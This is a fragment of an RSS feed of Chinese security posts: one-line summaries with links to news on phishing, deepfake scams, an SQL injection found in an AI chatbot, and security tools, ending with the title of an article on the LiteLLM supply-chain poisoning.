target="_blank">https://builders.ramp.com/post/100-vulnerabilities-patched-with-0-humans</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分享使用Claude AI工具审查Python脚本发现的安全和逻辑问题，包括TOCTOU竞态条件、权限问题等</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://isc.sans.edu/diary/Tool+updates+lots+of+security+and+logic+fixes/32820" target="_blank">https://isc.sans.edu/diary/Tool+updates+lots+of+security+and+logic+fixes/32820</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI安全公司利用AI代理发现麦肯锡内部聊天机器人Lilli存在SQL注入漏洞，暴露大量敏感数据</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli/" target="_blank">https://www.thestack.technology/mckinsey-ai-agent-hacked-lilli/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">发布研究报告，探讨AI代理行为治理，分析用户、开发者、角色和组织意图的协调对齐问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://techcommunity.microsoft.com/blog/microsoft-security-blog/governing-ai-agent-behavior-aligning-user-developer-role-and-organizational-intent/4503551" target="_blank">https://techcommunity.microsoft.com/blog/microsoft-security-blog/governing-ai-agent-behavior-aligning-user-developer-role-and-organizational-intent/4503551</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">探讨AI快速部署带来的网络安全风险，分析AI作为攻击向量的威胁，强调统一暴露管理的重要性</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.tenable.com/blog/secure-ai-attack-surface-exposure-management" target="_blank">https://www.tenable.com/blog/secure-ai-attack-surface-exposure-management</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">社工钓鱼</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">探讨如何滥用现代浏览器功能进行钓鱼攻击</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://certitude.consulting/blog/en/abusing-modern-browser-features-for-phishing/" target="_blank">https://certitude.consulting/blog/en/abusing-modern-browser-features-for-phishing/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FBI和CISA警告俄罗斯黑客通过钓鱼攻击劫持Signal和WhatsApp账户的大规模社工活动</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.malwarebytes.com/blog/news/2026/03/fbi-cisa-warn-of-russian-hackers-hijacking-signal-and-whatsapp-accounts" target="_blank">https://www.malwarebytes.com/blog/news/2026/03/fbi-cisa-warn-of-russian-hackers-hijacking-signal-and-whatsapp-accounts</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">报道东南亚诈骗团伙雇佣AI模特在视频通话中使用深度伪造技术进行诈骗活动</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.malwarebytes.com/blog/news/2026/03/scam-compounds-hiring-ai-models-to-seal-deal-in-deepfake-video-calls" target="_blank">https://www.malwarebytes.com/blog/news/2026/03/scam-compounds-hiring-ai-models-to-seal-deal-in-deepfake-video-calls</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">FriendlyDealer社交工程活动通过1500多个仿冒官方应用商店的网站推送未审核的赌博应用</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.malwarebytes.com/blog/scams/2026/03/friendlydealer-mimics-official-app-stores-to-push-unvetted-gambling-apps" target="_blank">https://www.malwarebytes.com/blog/scams/2026/03/friendlydealer-mimics-official-app-stores-to-push-unvetted-gambling-apps</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">其他</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ludus_kali_setup：用于在Ludus环境中配置Kali Linux虚拟机的Ansible角色，优化演示和实验室设置</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/mojeda101/ludus_kali_setup" target="_blank">https://github.com/mojeda101/ludus_kali_setup</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">rustunnel：用Rust编写的开源隧道服务，复制ngrok核心功能，可将本地服务通过自托管或托管中继暴露到公网</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/joaoh82/rustunnel" target="_blank">https://github.com/joaoh82/rustunnel</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">project-nomad：一个自包含的离线生存计算机，集成了关键工具、知识和AI功能</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Crosstalk-Solutions/project-nomad" target="_blank">https://github.com/Crosstalk-Solutions/project-nomad</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍RSigma工具包，用Rust编写，用于直接对JSON日志评估Sigma检测规则，无需SIEM系统</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://mostafa.dev/pattern-detection-and-correlation-in-json-logs-fab16334e4ee" target="_blank">https://mostafa.dev/pattern-detection-and-correlation-in-json-logs-fab16334e4ee</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍Hyoketsu工具，用于解决逆向工程中厂商依赖库过多的问题，提高代码审计效率</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://slcyber.io/research-center/hyoketsu-solving-the-vendor-dependency-problem-in-re" target="_blank">https://slcyber.io/research-center/hyoketsu-solving-the-vendor-dependency-problem-in-re</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">讨论IP KVM设备的安全威胁及检测方法，包括流氓IP KVM的滥用案例和检测技术</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://isc.sans.edu/diary/Detecting+IP+KVMs/32824" target="_blank">https://isc.sans.edu/diary/Detecting+IP+KVMs/32824</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011231" src="https://wechat2rss.xlab.app/img-proxy/?k=4a9acf0c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCkYEE21cGNpSUbjOvneXiaT2QVPiakF8C13qe9L4yibGaGJA06FxmzUxvTzU7kpIDF66QaibOlZmjqZuVKb7F1iaSmYUuqXHtWRApIU%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907473309609" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011232" src="https://wechat2rss.xlab.app/img-proxy/?k=ec2aa061&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCkO3IgJ9pumeEicibMpgAUIgvCEFFOaGY3XqnIckkrvcVFpRGibU0ibwUECftNOiad0RyX0ghc9GCbDJ8Jch2ibpgZLodtop3yv8xBsg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div><div style="margin: 10px 0% 0px;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;background-color: rgb(67, 146, 117);min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;padding: 10px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;text-align: center;box-sizing: border-box;"><div style="color: rgb(255, 255, 255);font-size: 17px;padding: 0px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">往期推荐</span></b></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494762&amp;idx=1&amp;sn=ca8490675064f1b8b18de2a02a4134b5&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.14-2026.3.20）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.14-2026.3.20）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494751&amp;idx=1&amp;sn=06f539727afaa65f36aa707fce4d3d8a&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.3.7-2026.3.13）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.3.7-2026.3.13）</a></span></p></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 100 100 0%;height: auto;align-self: center;box-sizing: border-box;"><div style="color: rgb(23, 54, 43);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494746&amp;idx=1&amp;sn=9dea57e1f5651252cff076bd01d30209&amp;scene=21#wechat_redirect" textvalue="每周蓝军技术推送（2026.2.28-2026.3.6）" data-itemshowtype="0" linktype="text" data-linktype="2">每周蓝军技术推送（2026.2.28-2026.3.6）</a></span></p></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=2f07dbec&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494891%26idx%3D2%26sn%3D9fea43e1c6cc95791e2f62f236fdb987">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 27 Mar 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>LiteLLM 供应链投毒深度分析：从 TeamPCP 连环攻击到全生态沦陷判</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494863&amp;idx=1&amp;sn=7dfc3a5beaa6eb8e38a24f1450827fbd</link>
      <description>2026年3月24日，Python 生态最热门的 LLM 网关库 LiteLLM 遭遇供应链投毒攻击。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-26 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=78960b35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jClvTSrOsabwMJnD3AsWWd0bBpeDxxoYic3lP1w4kYkfMJD2eD5ImiaaSkxlrNIGP71OeqdXRkCNFcw9J8q2prYQWHB4PvqicicR3Gg%2F0%3Fwx_fmt%3Djpeg"/></p>
